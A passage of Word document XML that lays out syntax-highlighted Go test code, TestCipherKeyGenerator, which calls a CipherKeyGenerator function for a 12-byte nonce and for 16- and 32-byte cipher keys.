          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"testing"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">func </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFC66D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>TestCipherKeyGenerator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(t *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>testing</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6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>) {</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t>tests := []</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">struct </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lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">name       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">ByteLength </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>{</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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">name:       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Generate IV(nonce), 12bytes"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">ByteLength: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6897BB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">name:       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Generate Cipher Key, 16bytes"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">ByteLength: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6897BB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">name:       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Generate Cipher Key, 32bytes"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">ByteLength: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6897BB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">tt := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">range </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>tests {</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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>t.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(tt.name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(t *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>testing</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6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>) {</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B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>CipherKeyGenerator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(tt.ByteLength)</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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>})</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t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D401488" w14:textId="77777777" w:rsidR="00423D0B" w:rsidRPr="00141C89" w:rsidRDefault="00423D0B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
